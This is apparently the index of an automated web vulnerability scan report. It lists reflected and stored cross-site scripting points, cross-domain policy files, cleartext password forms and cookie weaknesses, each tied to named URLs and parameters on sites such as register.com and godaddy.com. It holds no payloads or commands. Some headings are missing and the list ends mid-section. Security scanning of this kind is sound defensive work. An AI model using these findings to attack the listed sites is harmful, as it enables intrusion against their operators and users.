1.1. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]
1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie]
1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter]
1.4. http://www.cheapssls.com/index.php [REST URL parameter 1]
1.5. http://www.cheapssls.com/index.php [Referer HTTP header]
1.6. http://www.cheapssls.com/index.php [Referer HTTP header]
1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header]
1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header]
1.9. http://www.cheapssls.com/index.php [__utmb cookie]
1.10. http://www.cheapssls.com/index.php [stat_uniq_code cookie]
1.11. https://www.cheapssls.com/index.php [User-Agent HTTP header]
1.12. https://www.cheapssls.com/index.php [sgTrackerUserId cookie]
1.13. https://www.cheapssls.com/index.php [ve%5Bbrowser%5D parameter]
1.14. https://www.cheapssls.com/index.php [ve%5Bbrowser_version%5D parameter]
1.15. https://www.cheapssls.com/index.php [ve%5Bclient_language%5D parameter]
1.16. https://www.cheapssls.com/index.php [ve%5Bos%5D parameter]
1.17. https://www.cheapssls.com/index.php [ve%5Burl%5D parameter]
1.18. http://www.godaddy.com/gdshop/offers/cross_sell.asp [ASPSESSIONIDACSTCQTS cookie]
1.19. http://www.microcad.ca/cart/add/ [productid parameter]
2. Cross-site scripting (stored)
3.1. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 2]
3.2. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6 [REST URL parameter 3]
3.3. http://www.wunderground.com/dotset.php [id parameter]
3.4. http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]
4. Cross-site scripting (reflected)
4.1. http://feeds.feedburner.com/~s/meetup [i parameter]
4.2. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]
4.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]
4.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]
4.5. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mbox parameter]
4.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard [mboxId parameter]
4.7. http://s29.sitemeter.com/js/counter.asp [site parameter]
4.8. http://s29.sitemeter.com/js/counter.js [site parameter]
4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter]
4.10. http://www.meetup.com/api/ [method parameter]
4.11. http://www.microcad.ca/cart/add/ [productid parameter]
4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1]
4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1]
4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2]
4.15. http://www.register.com/favicon.ico [REST URL parameter 1]
4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1]
4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1]
4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1]
4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1]
4.20. http://www.register.com/js/homepage-optimized.js [REST URL parameter 1]
4.21. http://www.register.com/js/jquery-1.3.2.min.js [REST URL parameter 1]
4.22. http://www.register.com/unauthenticated_session_expired.rcmx [REST URL parameter 1]
4.23. http://www.typepad.com/services/toolbar [autofollowed parameter]
4.24. http://www.register.com/ [Referer HTTP header]
4.25. http://www.register.com/domain/searchresults.rcmx [Referer HTTP header]
4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]
5.1. http://adx.adnxs.com/crossdomain.xml
5.2. http://ajax.googleapis.com/crossdomain.xml
5.3. http://bh.contextweb.com/crossdomain.xml
5.4. http://c.mouseflow.com/crossdomain.xml
5.5. http://c7.zedo.com/crossdomain.xml
5.6. http://cspix.media6degrees.com/crossdomain.xml
5.7. http://d.adroll.com/crossdomain.xml
5.8. http://d3.zedo.com/crossdomain.xml
5.9. http://d7.zedo.com/crossdomain.xml
5.10. http://ib.adnxs.com/crossdomain.xml
5.11. http://idcs.interclick.com/crossdomain.xml
5.12. http://imagesak.securepaynet.net/crossdomain.xml
5.13. http://img1.wsimg.com/crossdomain.xml
5.14. http://img3.wsimg.com/crossdomain.xml
5.15. http://m.adnxs.com/crossdomain.xml
5.16. http://registercom.tt.omtrdc.net/crossdomain.xml
5.17. http://s.gravatar.com/crossdomain.xml
5.18. http://segment-pixel.invitemedia.com/crossdomain.xml
5.19. http://value.register.com/crossdomain.xml
5.20. http://www.wunderground.com/crossdomain.xml
5.21. http://ads.lfstmedia.com/crossdomain.xml
5.22. http://edge.sharethis.com/crossdomain.xml
5.23. http://login.dotomi.com/crossdomain.xml
5.24. http://pagead2.googlesyndication.com/crossdomain.xml
5.25. http://w.sharethis.com/crossdomain.xml
5.26. http://www.godaddy.com/crossdomain.xml
5.27. https://www.godaddy.com/crossdomain.xml
5.28. http://www.youtube-nocookie.com/crossdomain.xml
5.29. http://stats.wordpress.com/crossdomain.xml
6. Silverlight cross-domain policy
6.1. http://stats.wordpress.com/clientaccesspolicy.xml
6.2. http://value.register.com/clientaccesspolicy.xml
7. Cleartext submission of password
7.1. http://vasco.com/login.aspx
7.2. http://vasco.com/user_registration.aspx
8.1. http://bh.contextweb.com/bh/set.aspx
8.2. http://l.sharethis.com/pview
8.3. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
8.4. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard
8.5. http://registercom.tt.omtrdc.net/m2/registercom/mbox/standard
8.6. http://registercom.tt.omtrdc.net/m2/registercom/sc/standard
8.7. http://research.microsoft.com/en-us/about/awards.aspx
8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx
8.9. http://research.microsoft.com/en-us/um/people/ymwang/
8.10. http://www.facebook.com/extern/login_status.php
8.11. http://www.meetup.com/api/
8.12. http://www.register.com/css/home-optimized.css
8.13. http://www.register.com/js/aop-attach.js
8.14. http://www.register.com/js/homepage-optimized.js
8.15. http://www.register.com/js/jquery-1.3.2.min.js
9. ASP.NET ViewState without MAC enabled
9.1. https://www.sslmatrix.com/Order/quickorder
9.2. https://www.sslmatrix.com/ssl-promotion-code
9.3. https://www.sslmatrix.com/ssl-promotion-code/ssl-price
10. Cookie scoped to parent domain
10.1. http://api.twitter.com/1/statuses/media_timeline.json
10.2. http://api.twitter.com/1/statuses/user_timeline.json
10.3. http://api.twitter.com/1/statuses/user_timeline/MSFTResearch.json
10.4. http://api.twitter.com/1/statuses/user_timeline/SharePoint.json
10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
10.6. http://api.twitter.com/1/trends/1.json
10.7. http://api.twitter.com/1/trends/available.json
10.8. http://api.twitter.com/1/urls/resolve.json
10.9. http://api.twitter.com/1/users/search.json
10.10. http://api.twitter.com/i/search/image_facets.json
10.11. http://api.twitter.com/i/search/video_facets.json
10.12. http://login.dotomi.com/ucm/UCMController
10.13. http://www.cheapssls.com/
10.14. http://www.cheapssls.com/index.php
10.15. http://adx.adnxs.com/mapuid
10.16. http://am.trafficmp.com/a/bpix
10.17. http://am.trafficmp.com/a/bpix
10.18. http://api.flickr.com/clientaccesspolicy.xml
10.19. http://b.scorecardresearch.com/b
10.20. http://b.scorecardresearch.com/r
10.21. http://bh.contextweb.com/bh/set.aspx
10.22. http://c7.zedo.com/img/bh.gif
10.23. https://cart.godaddy.com/basket.aspx
10.24. http://cf.addthis.com/red/p.json
10.25. http://cf.addthis.com/red/usync
10.26. http://cspix.media6degrees.com/orbserv/hbpix
10.27. http://d7.zedo.com/img/bh.gif
10.28. http://d7.zedo.com/img/bh.gif
10.29. http://ds.addthis.com/red/psi/sites/vasco.com/p.json
10.30. http://ib.adnxs.com/getuid
10.31. http://ib.adnxs.com/seg
10.32. http://ib.adnxs.com/setuid
10.33. http://id.google.com/verify/EAAAAB18MDCNmAWnZ6ZMKxFbyXM.gif
10.34. http://id.google.com/verify/EAAAADMsrH8QTeh7gqteYecpwnc.gif
10.35. http://id.google.com/verify/EAAAALzxzy-p1oHxNaVBpSOT2kM.gif
10.36. http://idcs.interclick.com/Segment.aspx
10.37. https://idp.godaddy.com/login.aspx
10.38. https://idp.godaddy.com/retrieveaccount.aspx
10.39. http://image2.pubmatic.com/AdServer/Pug
10.40. http://img.godaddy.com/image.aspx
10.41. http://img.godaddy.com/pageevents.aspx
10.42. http://m.adnxs.com/msftcookiehandler
10.43. https://mya.godaddy.com/
10.44. https://mya.godaddy.com/products/accountlist.aspx
10.47. http://pixel.adblade.com/imps.php
10.48. http://pixel.mathtag.com/event/img
10.49. http://pixel.mathtag.com/event/js
10.50. http://pixel.rubiconproject.com/tap.php
10.51. http://pixel.rubiconproject.com/tap.php
10.53. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
10.54. http://segment-pixel.invitemedia.com/set_partner_uid
10.57. http://static.getclicky.com/js
10.58. http://www.godaddy.com/Payment/payment-options.aspx
10.59. http://www.godaddy.com/affiliates/affiliate-program.aspx
10.60. http://www.godaddy.com/gdshop/offers/cross_sell.asp
10.61. http://www.godaddy.com/shared/video/videos.aspx
10.62. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx
10.63. http://www.godaddy.com/ssl/ssl-certificates.aspx
10.64. http://www.register.com/css/basic.css
10.65. http://www.register.com/css/titan-screen.css
10.66. http://www.register.com/imgs/global/crtIcon.gif
10.67. http://www.register.com/imgs/global/registerLogo.gif
10.68. http://www.register.com/js/aop-attach.js
10.69. http://www.register.com/js/global.js
10.70. http://www.register.com/js/jquery-1.3.2.min.js
10.71. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js
10.72. http://www.register.com/js/jquery.cookie.js
10.73. http://www.register.com/js/jquery.jcarousellite.js
10.74. http://www.register.com/js/mbox.js
10.75. http://www.register.com/js/nicejforms.js
10.76. http://www.register.com/js/s_code.js
10.77. http://www.register.com/js/thickbox.js
11. Cookie without HttpOnly flag set
11.1. http://img.godaddy.com/image.aspx
11.2. http://img.godaddy.com/pageevents.aspx
11.3. http://login.dotomi.com/ucm/UCMController
11.4. http://www.cheapssls.com/
11.5. http://www.cheapssls.com/index.php
11.6. http://www.register.com/
11.7. http://www.register.com/domain/searchresults.rcmx
11.8. http://ad.yieldmanager.com/pixel
11.9. http://am.trafficmp.com/a/bpix
11.10. http://am.trafficmp.com/a/bpix
11.11. http://api.flickr.com/clientaccesspolicy.xml
11.12. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
11.13. http://b.scorecardresearch.com/b
11.14. http://b.scorecardresearch.com/r
11.15. http://bh.contextweb.com/bh/set.aspx
11.16. http://c7.zedo.com/img/bh.gif
11.17. https://cart.godaddy.com/basket.aspx
11.18. http://cf.addthis.com/red/p.json
11.19. http://cf.addthis.com/red/usync
11.20. http://community.research.microsoft.com/
11.21. http://cspix.media6degrees.com/orbserv/hbpix
11.22. http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6
11.23. http://d7.zedo.com/img/bh.gif
11.24. http://d7.zedo.com/img/bh.gif
11.25. http://ds.addthis.com/red/psi/sites/vasco.com/p.json
11.26. http://idcs.interclick.com/Segment.aspx
11.27. https://idp.godaddy.com/login.aspx
11.28. https://idp.godaddy.com/retrieveaccount.aspx
11.29. http://image2.pubmatic.com/AdServer/Pug
11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg
11.31. http://microsoftcambridge.com/Portals/0/portal.css
11.32. http://microsoftcambridge.com/Portals/0/rss.png
11.33. http://microsoftcambridge.com/Portals/0/search_results.png
11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png
11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css
11.36. http://microsoftcambridge.com/Portals/_default/default.css
11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js
11.38. http://microsoftcambridge.com/css/print.css
11.39. http://microsoftcambridge.com/css/styles.css
11.40. http://microsoftcambridge.com/img/working/about.png
11.41. http://microsoftcambridge.com/img/working/blog.png
11.42. http://microsoftcambridge.com/img/working/community.png
11.43. http://microsoftcambridge.com/img/working/events.png
11.44. http://microsoftcambridge.com/img/working/people.png
11.45. http://microsoftcambridge.com/img/working/teams.png
11.46. http://microsoftcambridge.com/img/working/working.png
11.47. http://microsoftcambridge.com/js/dnn.js
11.48. http://microsoftcambridge.com/js/dnn.xml.js
11.49. http://microsoftcambridge.com/js/dnn.xmlhttp.js
11.50. http://microsoftcambridge.com/js/dnncore.js
11.51. http://microsoftcambridge.com/js/jfeed.js
11.52. http://microsoftcambridge.com/js/jquery.js
11.53. http://microsoftcambridge.com/js/siteo.js
11.54. http://microsoftcambridge.com/js/twitter.min.js
11.55. http://microsoftcambridge.com/js/ui.js
11.56. https://mya.godaddy.com/
11.57. https://mya.godaddy.com/products/accountlist.aspx
11.60. http://pixel.adblade.com/imps.php
11.61. http://pixel.mathtag.com/event/img
11.62. http://pixel.mathtag.com/event/js
11.63. http://pixel.rubiconproject.com/tap.php
11.64. http://pixel.rubiconproject.com/tap.php
11.66. http://research.microsoft.com/apps/search/search.ashx
11.67. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
11.68. http://segment-pixel.invitemedia.com/set_partner_uid
11.71. http://static.getclicky.com/js
11.72. http://t4.trackalyzer.com/trackalyze.asp
11.73. http://www.cheapssls.com/index.php
11.74. https://www.cheapssls.com/index.php
11.75. http://www.godaddy.com/Payment/payment-options.aspx
11.76. http://www.godaddy.com/affiliates/affiliate-program.aspx
11.77. http://www.godaddy.com/gdshop/offers/cross_sell.asp
11.78. http://www.godaddy.com/shared/video/videos.aspx
11.79. http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx
11.80. http://www.godaddy.com/ssl/ssl-certificates.aspx
11.81. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
11.82. http://www.register.com/css/basic.css
11.83. http://www.register.com/css/titan-screen.css
11.84. http://www.register.com/favicon.ico
11.85. http://www.register.com/imgs/global/btnChooseAPackage_on.gif
11.86. http://www.register.com/imgs/global/btnFindIt_on.gif
11.87. http://www.register.com/imgs/global/crtIcon.gif
11.88. http://www.register.com/imgs/global/registerLogo.gif
11.89. http://www.register.com/js/aop-attach.js
11.90. http://www.register.com/js/global.js
11.91. http://www.register.com/js/jquery-1.3.2.min.js
11.92. http://www.register.com/js/jquery-ui-1.7.1.custom.min.js
11.93. http://www.register.com/js/jquery.cookie.js
11.94. http://www.register.com/js/jquery.jcarousellite.js
11.95. http://www.register.com/js/mbox.js
11.96. http://www.register.com/js/nicejforms.js
11.97. http://www.register.com/js/s_code.js
11.98. http://www.register.com/js/thickbox.js
12. Password field with autocomplete enabled
12.1. https://cart.godaddy.com/basket.aspx
12.2. https://idp.godaddy.com/login.aspx
12.3. https://idp.godaddy.com/login.aspx
12.4. https://idp.godaddy.com/login.aspx
12.5. https://idp.godaddy.com/login.aspx
12.6. https://idp.godaddy.com/login.aspx
12.7. https://idp.godaddy.com/login.aspx
12.8. https://idp.godaddy.com/login.aspx
12.9. https://idp.godaddy.com/retrieveaccount.aspx
12.10. https://idp.godaddy.com/retrieveaccount.aspx
12.14. http://vasco.com/login.aspx
12.15. http://vasco.com/user_registration.aspx
12.16. https://www.cheapssls.com/index.php
12.17. http://www.godaddy.com/Payment/payment-options.aspx
12.18. http://www.godaddy.com/affiliates/affiliate-program.aspx
12.19. http://www.godaddy.com/gdshop/offers/cross_sell.asp
12.20. http://www.godaddy.com/ssl/ssl-certificates.aspx
12.21. http://www.godaddy.com/ssl/ssl-certificates.aspx
12.24. http://www.meetup.com/Boston-BizSpark-Meetup/
12.25. http://www.meetup.com/Boston-BizSpark-Meetup/
12.26. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
12.27. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
12.28. http://www.meetup.com/sponsorships/
12.29. http://www.meetup.com/sponsorships/
12.30. http://www.meetup.com/whats_new/
12.31. http://www.meetup.com/whats_new/
12.32. https://www.microcad.ca/auth/login
12.33. https://www.sslmatrix.com/Order/quickorder
12.34. https://www.sslmatrix.com/Order/quickorder
12.35. https://www.sslmatrix.com/ssl-promotion-code
12.36. https://www.sslmatrix.com/ssl-promotion-code/ssl-price
13.1. https://platform.linkedin.com/js/secureAnonymousFramework
13.2. http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx
13.3. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx
13.4. http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx
13.5. http://research.microsoft.com/en-us/um/people/yongrui/
13.7. http://vasco.com/login.aspx
13.8. http://www.register.com/font/vag-bold.woff
14. Referer-dependent response
14.1. http://fast.fonts.com/d/e93ee223-5d52-4bdf-a113-c6c4c8936824.woff
14.2. https://idp.godaddy.com/login.aspx
14.3. http://seal.digicert.com/custsupport/sealtable.php
14.4. http://www.cheapssls.com/
14.5. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
14.6. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
14.7. http://www.facebook.com/plugins/like.php
14.8. http://www.godaddy.com/shared/video/videos.aspx
14.9. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
14.10. http://www.register.com/unauthenticated_session_expired.rcmx
16. SSL cookie without secure flag set
16.1. https://cart.godaddy.com/basket.aspx
16.2. https://idp.godaddy.com/login.aspx
16.3. https://idp.godaddy.com/retrieveaccount.aspx
16.4. https://mya.godaddy.com/
16.5. https://mya.godaddy.com/products/accountlist.aspx
16.6. https://support.microsoft.com/contactus/emailcontact.aspx
16.7. https://www.cheapssls.com/index.php
16.8. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx
17. Cross-domain Referer leakage
17.1. http://assets.tumblr.com/iframe.html
17.2. https://careers.microsoft.com/Resumes.aspx
17.3. https://cart.godaddy.com/basket.aspx
17.4. http://cm.g.doubleclick.net/pixel
17.5. http://cm.g.doubleclick.net/pixel
17.6. http://dg.specificclick.net/
17.7. http://googleads.g.doubleclick.net/pagead/ads
17.8. http://googleads.g.doubleclick.net/pagead/ads
17.9. http://googleads.g.doubleclick.net/pagead/ads
17.10. http://googleads.g.doubleclick.net/pagead/ads
17.11. https://idp.godaddy.com/login.aspx
17.12. https://idp.godaddy.com/retrieveaccount.aspx
17.13. http://mediacdn.disqus.com/1314991730/build/system/disqus.js
17.14. http://microsoftcambridge.com/Search/tabid/722/Default.aspx
17.23. http://research.microsoft.com/Search
17.24. http://research.microsoft.com/apps/dp/search.aspx
17.25. http://research.microsoft.com/apps/pubs/default.aspx
17.26. http://research.microsoft.com/apps/search/videosearch.ashx
17.27. http://research.microsoft.com/apps/video/default.aspx
17.28. http://s7.addthis.com/js/250/addthis_widget.js
17.29. https://support.microsoft.com/contactus/emailcontact.aspx
17.31. http://www.cheapssls.com/
17.32. http://www.cheapssls.com/index.php
17.33. https://www.cheapssls.com/
17.34. https://www.cheapssls.com/index.php
17.35. https://www.cheapssls.com/index.php
17.36. http://www.diginotar.com/SearchResults/tabid/37/Default.aspx
17.37. http://www.godaddy.com/Payment/payment-options.aspx
17.38. http://www.godaddy.com/gdshop/offers/cross_sell.asp
17.39. http://www.godaddy.com/ssl/ssl-certificates.aspx
17.40. http://www.google.com/maps
17.41. http://www.google.com/search
17.42. http://www.google.com/search
17.43. http://www.google.com/url
17.44. http://www.google.com/url
17.45. http://www.google.com/url
17.46. http://www.google.com/url
17.47. http://www.google.com/url
17.48. http://www.google.com/url
17.49. http://www.google.com/url
17.50. http://www.google.com/url
17.51. http://www.google.com/url
17.52. http://www.google.com/url
17.55. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
17.56. http://www.microsoft-careers.com/search
17.57. https://www.microsoft-careers.com/find.job
17.58. https://www.microsoft-careers.com/talentcommunity/subscribe/
17.59. http://www.register.com/domain/searchresults.rcmx
17.60. http://www.register.com/unauthenticated_session_expired.rcmx
17.61. https://www.sslmatrix.com/Order/quickorder
18. Cross-domain script include
18.1. http://assets.tumblr.com/iframe.html
18.2. https://cart.godaddy.com/basket.aspx
18.3. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
18.5. http://googleads.g.doubleclick.net/pagead/ads
18.6. http://googleads.g.doubleclick.net/pagead/ads
18.7. https://idp.godaddy.com/login.aspx
18.8. https://idp.godaddy.com/retrieveaccount.aspx
18.9. http://meetupblog.meetup.com/
18.11. http://research.microsoft.com/Search
18.12. http://research.microsoft.com/apps/dp/areas.aspx
18.13. http://research.microsoft.com/apps/dp/blank.jpg
18.14. http://research.microsoft.com/apps/dp/dl/downloads.aspx
18.15. http://research.microsoft.com/apps/dp/downloads.aspx
18.16. http://research.microsoft.com/apps/dp/ev/events.aspx
18.17. http://research.microsoft.com/apps/dp/gr/groups.aspx
18.18. http://research.microsoft.com/apps/dp/groups.aspx
18.19. http://research.microsoft.com/apps/dp/i/reverse_
18.20. http://research.microsoft.com/apps/dp/ne/news.aspx
18.21. http://research.microsoft.com/apps/dp/news.aspx
18.22. http://research.microsoft.com/apps/dp/pe/people.aspx
18.23. http://research.microsoft.com/apps/dp/pr/projects.aspx
18.24. http://research.microsoft.com/apps/dp/projects.aspx
18.25. http://research.microsoft.com/apps/dp/pu/publications.aspx
18.26. http://research.microsoft.com/apps/dp/search.aspx
18.27. http://research.microsoft.com/apps/dp/vi/videos.aspx
18.28. http://research.microsoft.com/apps/pubs/default.aspx
18.29. http://research.microsoft.com/apps/search/videosearch.ashx
18.30. http://research.microsoft.com/apps/video/default.aspx
18.31. http://research.microsoft.com/en-us/about/awards.aspx
18.32. http://research.microsoft.com/en-us/about/brochure-1.aspx
18.33. http://research.microsoft.com/en-us/about/brochure-2.aspx
18.34. http://research.microsoft.com/en-us/about/brochure-3.aspx
18.35. http://research.microsoft.com/en-us/about/brochure-4.aspx
18.36. http://research.microsoft.com/en-us/about/brochure-5.aspx
18.37. http://research.microsoft.com/en-us/about/brochure-6.aspx
18.38. http://research.microsoft.com/en-us/about/brochure-7.aspx
18.39. http://research.microsoft.com/en-us/about/brochure-8.aspx
18.40. http://research.microsoft.com/en-us/about/brochure-9.aspx
18.41. http://research.microsoft.com/en-us/about/contactus.aspx
18.42. http://research.microsoft.com/en-us/about/default.aspx
18.43. http://research.microsoft.com/en-us/about/directors.aspx
18.44. http://research.microsoft.com/en-us/about/feature/downloads.aspx
18.45. http://research.microsoft.com/en-us/about/paperawards.aspx
18.46. http://research.microsoft.com/en-us/collaboration/about/default.aspx
18.47. http://research.microsoft.com/en-us/collaboration/about/events.aspx
18.48. http://research.microsoft.com/en-us/collaboration/about/projects.aspx
18.49. http://research.microsoft.com/en-us/collaboration/about/summits.aspx
18.50. http://research.microsoft.com/en-us/collaboration/awards/default.aspx
18.51. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
18.52. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx
18.53. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx
18.54. http://research.microsoft.com/en-us/collaboration/bg_txt.png
18.55. http://research.microsoft.com/en-us/collaboration/default.aspx
18.56. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx
18.57. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx
18.58. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx
18.59. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx
18.60. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx
18.61. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx
18.62. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx
18.64. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx
18.65. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx
18.66. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx
18.67. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx
18.68. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
18.69. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
18.70. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx
18.71. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
18.72. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx
18.73. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx
18.74. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
18.75. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx
18.76. http://research.microsoft.com/en-us/collaboration/tools/default.aspx
18.77. http://research.microsoft.com/en-us/community/default.aspx
18.78. http://research.microsoft.com/en-us/default.aspx
18.79. http://research.microsoft.com/en-us/events/escience2011/
18.80. http://research.microsoft.com/en-us/events/indiaschooljune2011/
18.81. http://research.microsoft.com/en-us/events/women-in-computing2011/
18.82. http://research.microsoft.com/en-us/jobs/default.aspx
18.83. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx
18.84. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx
18.85. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx
18.86. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx
18.87. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx
18.88. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx
18.89. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx
18.90. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
18.91. http://research.microsoft.com/en-us/jobs/intern/default.aspx
18.92. http://research.microsoft.com/en-us/jobs/intern/russia.aspx
18.93. http://research.microsoft.com/en-us/labs/asia/default.aspx
18.94. http://research.microsoft.com/en-us/labs/cambridge/default.aspx
18.95. http://research.microsoft.com/en-us/labs/cmic/default.aspx
18.96. http://research.microsoft.com/en-us/labs/default.aspx
18.97. http://research.microsoft.com/en-us/labs/emic/default.aspx
18.98. http://research.microsoft.com/en-us/labs/fuse/default.aspx
18.99. http://research.microsoft.com/en-us/labs/ilabs/default.aspx
18.100. http://research.microsoft.com/en-us/labs/india/default.aspx
18.101. http://research.microsoft.com/en-us/labs/newengland/
18.102. http://research.microsoft.com/en-us/labs/newengland/default.aspx
18.103. http://research.microsoft.com/en-us/labs/redmond/default.aspx
18.104. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx
18.105. http://research.microsoft.com/en-us/labs/xcg/default.aspx
18.106. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
18.107. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
18.108. http://research.microsoft.com/en-us/news/features/interns-080309.aspx
18.109. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
18.110. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
18.111. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
18.112. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
18.113. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx
18.114. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
18.115. http://research.microsoft.com/en-us/people/abadi/default.aspx
18.116. http://research.microsoft.com/en-us/people/adiamant/default.aspx
18.117. http://research.microsoft.com/en-us/people/ajbrush/default.aspx
18.118. http://research.microsoft.com/en-us/people/akashl/
18.119. http://research.microsoft.com/en-us/people/alecw/
18.120. http://research.microsoft.com/en-us/people/alexac/default.aspx
18.121. http://research.microsoft.com/en-us/people/aphillip/
18.122. http://research.microsoft.com/en-us/people/aproutie/
18.123. http://research.microsoft.com/en-us/people/aratan/default.aspx
18.124. http://research.microsoft.com/en-us/people/asellen/
18.125. http://research.microsoft.com/en-us/people/asellen/default.aspx
18.126. http://research.microsoft.com/en-us/people/bainguo/default.aspx
18.127. http://research.microsoft.com/en-us/people/bibuxton/default.aspx
18.128. http://research.microsoft.com/en-us/people/birrell/default.aspx
18.129. http://research.microsoft.com/en-us/people/blinn/default.aspx
18.130. http://research.microsoft.com/en-us/people/bycook/default.aspx
18.131. http://research.microsoft.com/en-us/people/cthacker/default.aspx
18.132. http://research.microsoft.com/en-us/people/dburger/
18.133. http://research.microsoft.com/en-us/people/dburger/default.aspx
18.134. http://research.microsoft.com/en-us/people/deng/default.aspx
18.135. http://research.microsoft.com/en-us/people/dmb/
18.136. http://research.microsoft.com/en-us/people/dmb/default.aspx
18.137. http://research.microsoft.com/en-us/people/dwork/
18.138. http://research.microsoft.com/en-us/people/gbell/default.aspx
18.139. http://research.microsoft.com/en-us/people/ggr/default.aspx
18.140. http://research.microsoft.com/en-us/people/goldberg/default.aspx
18.141. http://research.microsoft.com/en-us/people/grama/default.aspx
18.142. http://research.microsoft.com/en-us/people/gray/
18.143. http://research.microsoft.com/en-us/people/gray/default.aspx
18.144. http://research.microsoft.com/en-us/people/hon/default.aspx
18.145. http://research.microsoft.com/en-us/people/horvitz/default.aspx
18.146. http://research.microsoft.com/en-us/people/hsalama/default.aspx
18.147. http://research.microsoft.com/en-us/people/hshum/default.aspx
18.148. http://research.microsoft.com/en-us/people/indranim/
18.149. http://research.microsoft.com/en-us/people/jamiesho/
18.150. http://research.microsoft.com/en-us/people/jbishop/default.aspx
18.151. http://research.microsoft.com/en-us/people/jiansun/default.aspx
18.152. http://research.microsoft.com/en-us/people/johndo/default.aspx
18.153. http://research.microsoft.com/en-us/people/jplatt/default.aspx
18.154. http://research.microsoft.com/en-us/people/jtw/default.aspx
18.155. http://research.microsoft.com/en-us/people/krw/default.aspx
